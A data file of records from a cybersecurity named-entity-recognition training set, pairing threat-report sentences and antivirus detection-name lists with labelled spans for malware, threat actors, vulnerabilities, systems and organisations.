{"text": "A backdoor also known as: Backdoor.Bladabindi.FC.1799 Trojan.Zusy.D17364 Win32.Trojan.WisdomEyes.16070401.9500.9949 TrojWare.MSIL.Dynamer.AS Trojan.DownLoader12.58576 Trojan.Msil W32/Trojan.PPUX-1583 Trj/GdSda.A Win32/Trojan.744", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005014", "source": "cyner2_train"}}
{"text": "Secondly, PowerShell can be used to steal usernames, passwords, and other system information without an executable file being present.", "spans": {"SYSTEM: PowerShell": [[10, 20]], "VULNERABILITY: can be used to steal": [[21, 41]], "VULNERABILITY: without an executable file being present.": [[93, 134]]}, "info": {"id": "cyner2_train_005016", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PSW.Win32.YahuPass!O Worm.Zaphal Trojan/PSW.YahuPass.jo Trojan.Graftor.D3448 Win32.Trojan.Delf.ff Win.Trojan.Yahupass-1 Trojan.Win32.Scar.oeuq Trojan.Win32.YahuPass.cthys Trojan.Win32.Z.Yahupass.575793 Trojan/PSW.YahuPass.y Trojan[PSW]/Win32.YahuPass Worm:Win32/Zaphal.B Troj.W32.Scar!c Trojan.Win32.Scar.oeuq Trojan/Win32.Losel.C65535 Trojan.Scar Win32/Spy.Delf.OPX Win32.Trojan.Scar.Alis Trojan.PWS.YahuPass!c1rtyKxFJLA Win32/Trojan.57c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005017", "source": "cyner2_train"}}
{"text": "As this is not the first time that CVE-2017-0199 was exploited for an attack, we thought it fitting to analyze this new attack method to provide some insight into how this vulnerability can be abused by other campaigns in the future.", "spans": {"VULNERABILITY: CVE-2017-0199": [[35, 48]], "MALWARE: exploited for": [[53, 66]], "VULNERABILITY: vulnerability": [[172, 185]], "THREAT_ACTOR: campaigns": [[209, 218]]}, "info": {"id": "cyner2_train_005018", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Dropper.Neblso W32/Dropper.CPO Trojan.Dropper TROJ_MULTIDRP.LA Trojan-Dropper.Win32.Neblso Trojan.Win32.Neblso.dkkt Trojan.Win32.PSWLdPinch.41277 Troj.Dropper.W32.Neblso!c Trojan.MulDrop.911 Dropper.Neblso.Win32.7 TROJ_MULTIDRP.LA BehavesLike.Win32.VirRansom.pc Trojan-Dropper.Win32.Neblso W32/Risk.OJSS-0633 TrojanDropper.Ichitaro.Tarodrop.g Trojan[Dropper]/Win32.Neblso Trojan-Dropper.Win32.Neblso Dropper/Win32.Xema.C62110 TrojanDropper.Neblso Win32/TrojanDropper.Neblso Trojan.MultiDrop!Nb+sQh+u4tI W32/Dropper.BBBT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005019", "source": "cyner2_train"}}
{"text": "Bitcoin was the preferred transaction currency.", "spans": {}, "info": {"id": "cyner2_train_005020", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.RedSpy.Win32.12 Trojan.Heur.E7FD56 Win32.Trojan.WisdomEyes.16070401.9500.9966 W32/Backdoor2.WQR Backdoor.Trojan Backdoor.Win32.RedSpy.12 Trojan.Win32.RedSpy.bnfsv Backdoor.Win32.A.RedSpy.407552 BackDoor.Redspy.12 W32/Backdoor.ZOHG-8805 Trojan[Backdoor]/Win32.RedSpy Backdoor:Win32/RedSpy.1_2 Backdoor.Win32.RedSpy.12 Trojan/Win32.Banker.C143433 Backdoor.RedSpy Backdoor.RedSpy!KQ5NSrZfjaE W32/RedSpy.V12!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005021", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9917 Trojan.Cridex Trojan.Win64.PackedENT.exqnqt Trojan.PackedENT.61 BehavesLike.Win64.PdfCrypt.bm W64/Trojan.WJME-6640 Trojan.Mikey.D1231F Trojan.Dridex Trojan.Win64.Krypt Trj/CI.A Win32/Trojan.cb1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005022", "source": "cyner2_train"}}
{"text": "One more targeted attack against Ukraine that used spear phishing to deliver the DarkTrack backdoor through a fake prescription of the Minister of Defense of Ukraine.", "spans": {"MALWARE: DarkTrack backdoor": [[81, 99]], "ORGANIZATION: the Minister of Defense of Ukraine.": [[131, 166]]}, "info": {"id": "cyner2_train_005023", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Tvt!O Trojan/Korplug.j Win32.Trojan.WisdomEyes.16070401.9500.9991 Backdoor.Trojan BKDR_THOPER.SMZTDE Trojan.Korplug.Win32.8 BKDR_THOPER.SMZTDE W32/Trojan.LEDO-1330 Trojan/Tvt.ay Trojan/Win32.Tvt Trojan.Kazy.D1C8B5 Backdoor:Win32/Thoper.F!dha Backdoor/Win32.Etso.R19357 Trojan.Tvt!rB4pBoPmMmk Trojan.Kazy Win32/Trojan.9b1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005025", "source": "cyner2_train"}}
{"text": "Since then, the number of cases using PoisonIvy in such attacks decreased, and there was no special variant with expanded features seen in the wild.", "spans": {"MALWARE: PoisonIvy": [[38, 47]]}, "info": {"id": "cyner2_train_005026", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLTMSTRI.Trojan Trojan/Qhost.admt Win32.Trojan.WisdomEyes.16070401.9500.9983 Trojan.Qhosts Trojan.Win32.Qhost.rfrep Troj.W32.Qhost.admt!c Trojan.FakeAV.10958 Trojan.Qhost.Win32.9572 W32/Trojan.AEUL-0771 Trojan/Qhost.eht TR/Qhost.eozdy Trojan/Win32.Qhost Trojan.Graftor.Elzob.D22D4 Trojan.Qhost Trojan.HostsMod Trj/CI.A Win32/Qhost.ORK Trojan.Qhost!OWegFrReFAQ Trojan.Win32.Qhost", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005028", "source": "cyner2_train"}}
{"text": "The backdoor Trojan authors have called it XAgentOSX, which shares the name XAgent with one of Sofacy's Windows-based Trojan and references Apple's previous name for macOS, OS X.", "spans": {"THREAT_ACTOR: The backdoor Trojan authors": [[0, 27]], "MALWARE: XAgentOSX,": [[43, 53]], "MALWARE: XAgent": [[76, 82]], "THREAT_ACTOR: Sofacy's": [[95, 103]], "MALWARE: Windows-based Trojan": [[104, 124]], "ORGANIZATION: Apple's": [[140, 147]], "SYSTEM: macOS, OS X.": [[166, 178]]}, "info": {"id": "cyner2_train_005029", "source": "cyner2_train"}}
{"text": "Trend Micro first discovered the Alice ATM malware family in November 2016 as result of our joint research project on ATM malware with Europol EC3.", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "MALWARE: Alice ATM malware family": [[33, 57]], "MALWARE: ATM malware": [[118, 129]], "ORGANIZATION: Europol EC3.": [[135, 147]]}, "info": {"id": "cyner2_train_005030", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Veediem Trojan.Razy.D212D5 Win32.Trojan.WisdomEyes.16070401.9500.9585 HackTool.Win32.AllinOne.g Tool.Allinone.1 BehavesLike.Win32.Fujacks.tm HackTool.Win32.AllinOne.g Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005032", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ismdoor W32/Ismdoor.A Trojan.MSIL.Ismdoor.a Trojan.Win32.Ismdoor.euvcaa Troj.Msil.Ismdoor!c Trojan.Ismdoor.Win32.2 Trojan.MSIL.Ismdoor W32/Trojan.WGWW-8625 Trojan.MSIL.hjyc Trojan/MSIL.Ismdoor Trojan.MSIL.Ismdoor.a Trojan/Win32.Ismdoor.C2249090 Trojan.MSIL.Ismdoor Trj/WLT.D Trojan.Ismdoor MSIL/Ismdoor.A Msil.Trojan.Ismdoor.Efax Trojan.Ismdoor! W32/Ismdoor.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005033", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Backdoor.PCClient.TCH Backdoor.PcClient Backdoor.PCClient.TCH BKDR_PCCLIEN.AFR Win32.Trojan.WisdomEyes.16070401.9500.9973 Backdoor.Formador BKDR_PCCLIEN.AFR Backdoor.PCClient.TCH Backdoor.Win32.PcClient.gehc Backdoor.PCClient.TCH Trojan.Win32.PcClient.evwdyc Trojan.Win32.Z.Pcclient.617695.A Backdoor.W32.Pcclient!c Backdoor.PCClient.TCH Backdoor.PCClient.TCH Trojan.Proxy.20157 Backdoor.PcClient.Win32.30956 BehavesLike.Win32.PWSZbot.jc Trojan.Win32.Enigma W32/Trojan.MPTU-6658 Trojan[Backdoor]/Win32.PcClient Backdoor.PCClient.TCH Backdoor.Win32.PcClient.gehc Trojan/Win32.PcClient.C22919 TScope.Malware-Cryptor.SB Win32.Backdoor.Pcclient.Ebqc W32/Bckdr.Z!tr Win32/Backdoor.599", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005034", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_GE.3396767B Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GE.3396767B Win.Tool.Winactivator-1 Win32.Riskware.WinActivator.A Trojan.Win32.Kryptik.ernenh BehavesLike.Win32.PUPXAG.tc W32/Trojan.PMWL-5504 HackTool.WinActivator Trj/CI.A Trojan.MSIL.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005036", "source": "cyner2_train"}}
{"text": "The PC version has the ability to achieve complete remote control over the victim machine, including monitoring webcams and microphones.", "spans": {"SYSTEM: PC version": [[4, 14]], "SYSTEM: victim machine,": [[75, 90]]}, "info": {"id": "cyner2_train_005038", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D19050 Trojan.Powerduke Trojan:Win32/Yedob.A!dha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005039", "source": "cyner2_train"}}
{"text": "As an example, the following email was sent to a Turkish government organization using a lure of purported new portal logins for an airline's website.", "spans": {"ORGANIZATION: Turkish government organization": [[49, 80]]}, "info": {"id": "cyner2_train_005040", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9992 TR/Crypt.ZPACK.wqbfr Trojan[Downloader]/Win32.MapsGory Trojan.Razy.D3751F Trojan/Win32.MapsGory.C2205147 Malware-Cryptor.Limpopo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005041", "source": "cyner2_train"}}
{"text": "After launching, it hides its presence on the system and checks the defined Twitter account at regular intervals for commands.", "spans": {"SYSTEM: system": [[46, 52]], "SYSTEM: Twitter account": [[76, 91]]}, "info": {"id": "cyner2_train_005042", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Putabmow.RF5 Trojan.Downloader.Wmbatupd Win.Adware.Graftor-5699 Variant.Adware.Graftor.mrlb Adware.Wombat.1 Trojan.FakeAV.Win32.319646 BehavesLike.Win32.BrowseFox.fh Trojan-Downloader.Win32.Putabmow TR/Dldr.Putabmow.AC TrojanDownloader:Win32/Putabmow.A PUP/Win32.Graftor.R158727 Win32/Trojan.a6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005045", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.EggDrop.u BackDoor.EggDrop.16 Backdoor.Win32.EggDrop Trojan[Backdoor]/Win32.EggDrop.u Backdoor.Win32.EggDrop.u Backdoor:Win32/Dropegg.K Trojan/Win32.Eggdrop.R129522 Backdoor.EggDrop Win32/EggDrop.16", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005047", "source": "cyner2_train"}}
{"text": "Once installed the bootkit infects the operating system with a backdoor at the early booting stage.", "spans": {"MALWARE: bootkit": [[19, 26]], "SYSTEM: operating system": [[39, 55]], "MALWARE: backdoor": [[63, 71]]}, "info": {"id": "cyner2_train_005048", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Notpa Backdoor.Win32!O Backdoor.Notpa Backdoor.Notpa.Win32.4 Backdoor.W32.Notpa.l1pr Backdoor.Notpa W32/Backdoor.YTLZ-6459 Backdoor.Trojan BKDR_NOTPA.A Win.Trojan.NotPad-1 Backdoor.Win32.Notpa Backdoor.Notpa Trojan.Win32.Notpa.dkrv Backdoor.Notpa Backdoor.Win32.BackDoor.2_02 Backdoor.Notpa BackDoor.Zemac.200 BKDR_NOTPA.A W32/Backdoor2.EGAF TR/Notpad.Srv_#1 Trojan[Backdoor]/Win32.Notpa Win32.Hack.Notpa.kcloud Backdoor.Win32.Notpa.10240 Backdoor.Win32.Notpa Backdoor.Notpa Win-Trojan/Notpa.10240 Backdoor.Notpa Win32/BackDoor.2_02 Win32.Backdoor.Notpa.Wwoe Backdoor.Notpa!UhKbM28gXZk Backdoor.Win32.Notpa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005049", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Ninja Win32.Trojan.WisdomEyes.151026.9950.9999 Trojan-Ransom.Win32.Democry.a Trojan.Encoder.4608 Trojan.Filecoder.Win32.2542 BehavesLike.Win32.BadFile.tz TR/Symmi.sqfb W32/Filecoder.NGQ!tr Trojan.Symmi.D1F61 Trojan/Win32.Filecoder Ransom:Win32/SieteCrypto.A BScope.P2P-Worm.Palevo Win32.Trojan.Symmi.Wskd Trojan.Democry! Trojan.Win32.Filecoder Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005051", "source": "cyner2_train"}}
{"text": "operation targeting individuals in Ukraine.", "spans": {"ORGANIZATION: individuals": [[20, 31]]}, "info": {"id": "cyner2_train_005052", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeDocD.fam.Trojan Worm.Hybris.PLI Worm.Win32.AutoRun!O Worm.AutoIt.Yuner.A Worm.Hybris.PLI Trojan/Yuner.b Worm.Hybris.PLI Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.SEDY-1174 W32.Badday.A WORM_AUTORUN.BWK Worm.Hybris.PLI Worm.Win32.AutoIt.r Worm.Hybris.PLI Worm.Win32.AutoIt.261440 W32.W.AutoIt.l3OL Worm.Hybris.PLI Worm.Win32.AutoIt.~AN Trojan.AVKill.31317 Worm.AutoIt.Win32.2853 WORM_AUTORUN.BWK BehavesLike.Win32.YahLover.dc W32/Worm.MWD TrojanDownloader.JS.hi WORM/Autorun.55698 GrayWare[AdWare]/Win32.Yuner.a Worm:Win32/Yuner.A Worm.Win32.AutoIt.r Win32/Hybris.worm.261539 W32/YahLover.worm Worm.Autoit.Autorunner Trojan.Injector.AutoIt W32/Sohanat.GW.worm I-Worm.Yuner.B Win32/Yuner.B Worm.Win32.AutoRun.f Worm.Win32.AutoRun Trojan.Win32.AutoIt.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005053", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Yarner.D@mm Worm/W32.Yarner.437760.D W32.Yarner Trojan.Win32.Yarner.eokq W32/Yarner.D@mm Win32.Yarner Worm.Yarner.D Email-Worm.Win32.Yarner.d Win32.Yarner.D@mm I-Worm.Yarner.D I-Worm.Win32.Yarner.D Worm.Win32.Yarner.D Win32.Yarner.D@mm Win32.HLLM.Yarner.3 W32/YaW-Setup.3 I-Worm/Yarner.d Worm.Yarner.d.kcloud Worm:Win32/Yarner.C@mm Win32/Yarner.worm.437760.C Win32.Yarner.D@mm W32/Yarner.D@mm Worm.Yarner.d Malware.Yarner Win32/Yarner.D Worm.Yarner.d Email-Worm.Win32.Yarner.D W32/Yarner.D@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005055", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameRWALXAF.Worm Trojan.Win32.VB!O Trojan.Mofksys.A Worm.Mofksys Trojan/VB.osk Win32.Trojan.VB.kc W32.Gosys Win32/Mofksys.C Trojan-Ransom.Win32.Blocker.oow Trojan.Win32.Blocker.covlpo Troj.W32.Swisyn.mzNn Trojan.VbCrypt.250 Trojan.VB.Win32.59196 BehavesLike.Win32.Swisyn.dh Trojan.Win32.VB Trojan[Ransom]/Win32.Blocker Worm:Win32/Mofksys.A Trojan.Win32.A.VB.192512.N Trojan-Ransom.Win32.Blocker.oow Trojan/Win32.Swisyn.R1452 W32/Swisyn.ag MAS.Trojan.VB.01047", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005056", "source": "cyner2_train"}}
{"text": "Neutrino Exploit Kit EK appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits.", "spans": {"MALWARE: Neutrino Exploit Kit": [[0, 20]], "MALWARE: new exploits.": [[114, 127]]}, "info": {"id": "cyner2_train_005057", "source": "cyner2_train"}}
{"text": "We immediately contacted psychcentral about this infection as early as we have discovered it.", "spans": {}, "info": {"id": "cyner2_train_005058", "source": "cyner2_train"}}
{"text": "Yesterday morning, August 5, a Firefox user informed us that an advertisement on a news site in Russia was serving a Firefox exploit that searched for sensitive files and uploaded them to a server that appears to be in Ukraine.", "spans": {"SYSTEM: Firefox user": [[31, 43]], "MALWARE: Firefox exploit": [[117, 132]], "SYSTEM: server": [[190, 196]]}, "info": {"id": "cyner2_train_005059", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Welranax Trojan/Delf.sjo Win32.Trojan.Delf.iv not-a-virus:AdWare.Win32.Delf.gum Trojan.Win32.Z.Delf.409600.D Adware.Delf.Win32.2253 Trojan-Dropper.Delf W32/Trojan.ZLEU-3835 GrayWare[AdWare]/Win32.Delf not-a-virus:AdWare.Win32.Delf.gum Trojan:Win32/Welranax.A Trojan/Win32.Hupigon.C979817 AdWare.Delf Trj/CI.A Win32/Delf.SJO Win32.Adware.Delf.Wrgd PUA.Delf! Win32/Trojan.e91", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005061", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.94C0 Trojan.Barys.DE38F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005063", "source": "cyner2_train"}}
{"text": "Foreign policy, future of the US Army Officer Corps, and economic development are only a few of the keywords that threat actors have been using in spear-phishing attacks against directors and project managers of technology-inclined US government contractors.", "spans": {"ORGANIZATION: US": [[30, 32]], "ORGANIZATION: economic development": [[57, 77]], "THREAT_ACTOR: threat actors": [[114, 127]], "ORGANIZATION: directors": [[178, 187]], "ORGANIZATION: project managers": [[192, 208]], "ORGANIZATION: US government contractors.": [[232, 258]]}, "info": {"id": "cyner2_train_005064", "source": "cyner2_train"}}
{"text": "This extensive campaign infected over 14 million devices, rooting 8 million of them with an unprecedented success rate.", "spans": {"THREAT_ACTOR: campaign": [[15, 23]], "SYSTEM: devices,": [[49, 57]], "VULNERABILITY: rooting": [[58, 65]]}, "info": {"id": "cyner2_train_005065", "source": "cyner2_train"}}
{"text": "Affiliates only had to dole out at least 5% of their revenue to continue distributing the ransomware.", "spans": {}, "info": {"id": "cyner2_train_005066", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_DROPPR.SMC Win32.Trojan.WisdomEyes.16070401.9500.9967 TROJ_DROPPR.SMC Win.Downloader.54186-1 Trojan.Win32.Small.depzsf Trojan.MulDrop4.31372 BehavesLike.Win32.FakeAlertSecurityTool.cc Trojan[Downloader]/Win32.Dadobra TrojanDropper:Win32/Preald.A Trojan/Win32.Vilsel.C888605 TrojanDownloader.Dadobra Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005067", "source": "cyner2_train"}}
{"text": "In January of 2016, a tiny downloader named Godzilla Loader was advertised in the Damagelab forum.", "spans": {"MALWARE: tiny downloader": [[22, 37]], "MALWARE: Godzilla Loader": [[44, 59]], "ORGANIZATION: Damagelab forum.": [[82, 98]]}, "info": {"id": "cyner2_train_005069", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FakeTC.Win32.3 W32/Trojan2.OZHB Win32/FakeTC.A Win32.Trojan.FakeTC.A Trojan.FakeTC.3 W32/Trojan.MTLD-1219 Trojan/FakeTC.c Trojan/Win32.FakeTC Trojan.FakeTC Backdoor.Bot Trojan.Win32.Faketc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005070", "source": "cyner2_train"}}
{"text": "Typically, attackers do not use patterns for very long, because security professionals eventually identify and subsequently block these patterns.", "spans": {"THREAT_ACTOR: attackers": [[11, 20]], "ORGANIZATION: security professionals": [[64, 86]]}, "info": {"id": "cyner2_train_005072", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke.Winerror Joke.Winerror Trojan.Winerror Hoax.W16.BadJoke.WinError!c Joke.Winerror WinError.Trojan Joke.WinError Hoax.Win16.BadJoke.WinError Riskware.Win16.WinError.hwcm Joke.Winerror ApplicUnwnt.Win16.BadJoke.WinError Tool.BadJoke.Win16.8 not-virus:Joke.Win16.WinError JOKE/Winerror.A HackTool[Hoax]/Win16.WinError Joke.Winerror Hoax.Win16.BadJoke.WinError Trojan.Win16.BadJoke.WinError Win16.Trojan-psw.Badjoke.Dygs Hoax.Win16.BadJoke.WinError Joke.Winerror", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005073", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PackedCRTD.Win32.9317 Win32.Trojan.WisdomEyes.16070401.9500.9843 Win32.Trojan.Falsesign.Taoo Trojan.PWS.Banker1.22573 Trojan:Win32/Banker.AF Win32/Trojan.115", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005074", "source": "cyner2_train"}}
{"text": "The malware comes equipped with a variety of features and can be purchased for $50 directly from the author.", "spans": {}, "info": {"id": "cyner2_train_005075", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Nemesis.S1305933 Trojan.Deshacop.Win32.847 Trojan.Ransom.Nemesis.8 Win32.Trojan.WisdomEyes.16070401.9500.9551 Win32.Trojan-Ransom.Nemesis.B Trojan-Ransom.Win32.Cryptoff.xe Heur.Packed.Unknown Trojan.Encoder.15133 Trojan[Ransom]/Win32.Snocry Ransom:Win32/CryptoLemPiz.A Trojan-Ransom.Win32.Cryptoff.xe Trojan/Win32.Snocry.C1923609 BScope.Trojan-Ransom.Snocry Ransom.Cerber Trojan.Win32.Filecoder Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005076", "source": "cyner2_train"}}
{"text": "In the case of the CVE-2017-0199 Word exploit, we have observed this in a much more accelerated time scale.", "spans": {"MALWARE: Word exploit,": [[33, 46]]}, "info": {"id": "cyner2_train_005077", "source": "cyner2_train"}}
{"text": "BlackBerry researchers have observed a new campaign by the Russian state-sponsored threat group, known as APT29, targeting European Union countries and their diplomatic systems, including that of Poland's ambassador to the United States.", "spans": {"ORGANIZATION: BlackBerry researchers": [[0, 22]], "THREAT_ACTOR: new campaign": [[39, 51]], "THREAT_ACTOR: the Russian state-sponsored threat group,": [[55, 96]], "THREAT_ACTOR: APT29,": [[106, 112]], "SYSTEM: diplomatic systems,": [[158, 177]], "ORGANIZATION: Poland's ambassador to the United States.": [[196, 237]]}, "info": {"id": "cyner2_train_005080", "source": "cyner2_train"}}
{"text": "Fortinet detects this threat as W32/Miner.", "spans": {"ORGANIZATION: Fortinet": [[0, 8]], "MALWARE: threat": [[22, 28]]}, "info": {"id": "cyner2_train_005086", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanAPT.Duberath.B3 Backdoor.VB.Win32.14561 Backdoor.W32.VB.mtc!c Backdoor/VB.mtc BKDR_VBBOT.AM W32/VBBot.A Trojan.Dosvine BKDR_VBBOT.AM Win.Trojan.Hydraq-30 Backdoor.Win32.VB.mtc Trojan.Win32.VB.cuyqz Backdoor.Win32.VBbot.118784 Trojan.DownLoader2.62750 Backdoor.IRCBot BehavesLike.Win32.VBObfus.ct Trojan.Win32.Duberath W32/VBBot.DXMJ-6902 Trojan[Backdoor]/Win32.VB Backdoor.Win32.VB.mtc Trojan:Win32/Duberath.B Backdoor.VBbot.A Backdoor.IRCBot Trojan.Crypted.18705 Win32.Backdoor.Vb.Wrha Trojan.VBbot!c3mtyEoqCqM Win32/Backdoor.fdf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005091", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod3af.Trojan.e4b3 Trojan-Downloader/W32.Zlob.62877 Trojan.Dropper W32/Trojan2.NNPL Downloader.HJFG TROJ_SPNR.15L411 Trojan.Downloader.NSIS-3 Trojan-Downloader.Win32.NSIS.hn Trojan.DownLoader3.61765 TROJ_SPNR.15L411 Heuristic.BehavesLike.Win32.Downloader.D TrojanDownloader:Win32/Ocibt.A Win-Trojan/Downloader.62877 W32/Trojan.MONE-7612 TrojanDownloader.hn Trj/CI.A W32/Dloader.HG!tr.NSIS Dropper.Instaler.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005093", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Patpoopy.Win32.18 Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan.MPOM-1589 Win.Trojan.PupyRat-5710268-0 Trojan.Win32.Patpoopy.ewuxjt Trojan.Win32.Z.Zusy.3419648.Q Python.PuPy.20 BehavesLike.Win32.Injector.wc Trojan.Zusy.D4035B Trojan/Win32.Shelma.C2361381 Trojan.Win64.Shelma Trj/CI.A Win32.Trojan.Patpoopy.Lpky Trojan.Win64.Shelma RAT.Pupy W32/Patpoopy.E!tr Win32/Trojan.2c0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005094", "source": "cyner2_train"}}
{"text": "We call this new group RTM- it uses custom malware, written in Delphi, that we cover in detail in later sections.", "spans": {"THREAT_ACTOR: new group RTM-": [[13, 27]], "MALWARE: custom malware,": [[36, 51]], "SYSTEM: Delphi,": [[63, 70]]}, "info": {"id": "cyner2_train_005095", "source": "cyner2_train"}}
{"text": "The report includes a review of the malware's sales procedure and customer reviews, as well as a full technical analysis of its multiple plugins.", "spans": {}, "info": {"id": "cyner2_train_005096", "source": "cyner2_train"}}
{"text": "Since February this year Antiy CERT has detected a new round of phishing activities using GuLoader to deliver the AgentTesla secret-stealing Trojan.", "spans": {"ORGANIZATION: Antiy CERT": [[25, 35]], "MALWARE: GuLoader": [[90, 98]], "MALWARE: the AgentTesla secret-stealing Trojan.": [[110, 148]]}, "info": {"id": "cyner2_train_005099", "source": "cyner2_train"}}
{"text": "Four of them had more than 10,000 installs and one of them had more than 50,000 installs.", "spans": {}, "info": {"id": "cyner2_train_005101", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Win64 Win32.Trojan.WisdomEyes.16070401.9500.9986 Win64.Trojan-qqpass.Qqrob.Lmug BehavesLike.Win32.Rootkit.dh HackTool.Mimikatz Trojan.PSW.Mimikatz.acm Trojan[PSW]/Win64.Mimikatz HackTool:Win32/Mimikatz.A!dha Troj.Psw.Win64.Mimikatz!c BScope.TrojanPSW.Mimikatz Win32/Trojan.PSW.a2b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005103", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Kinkisc.Worm Trojan.Dropper.SRY TrojanDownloader.Zlob.A4 Trojan.Fanny.MB TROJ_ZLOB.SMFM W32.Fanni Win32/Zlob.PL TROJ_ZLOB.SMFM Win.Worm.Autorun-7948 Trojan.Dropper.SRY Trojan.Win32.EquationDrug.n Trojan.Dropper.SRY Trojan.Win32.Downloader.184320.CW Trojan.Dropper.SRY Trojan.DownLoad2.36935 BehavesLike.Win32.Backdoor.ch Worm.Win32.Funny Worm/Win32.AutoRun Worm:Win32/Fanys.A Trojan.Win32.EquationDrug.n Trojan.Dropper.SRY Worm.Fanny Trojan.Dropper.SRY Trojan.Win32.Downloader.tyo Worm.Win32.Fanny.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005104", "source": "cyner2_train"}}
{"text": "Archive files ZIP, RAR, ACE, and ISOs containing EXE payloads", "spans": {"MALWARE: EXE payloads": [[49, 61]]}, "info": {"id": "cyner2_train_005105", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Autoit Trojan.Symmi.D10095 Trojan.Win32.Autoit.exnvng Trojan.Win32.Z.Autoit.1079042 Troj.W32.Autoit!c Trojan.Inject1.38999 Trojan.AutoIt.Win32.7 BehavesLike.Win32.Trojan.th Trojan.Win32.Eupuds Trojan.Autoit.ixi Trojan:Win32/BrobanEup.A Trojan.Autoit.Banker Win32.Trojan.Autoit.Szbl W32/Autoit.AAV!tr Win32/Trojan.839", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005106", "source": "cyner2_train"}}
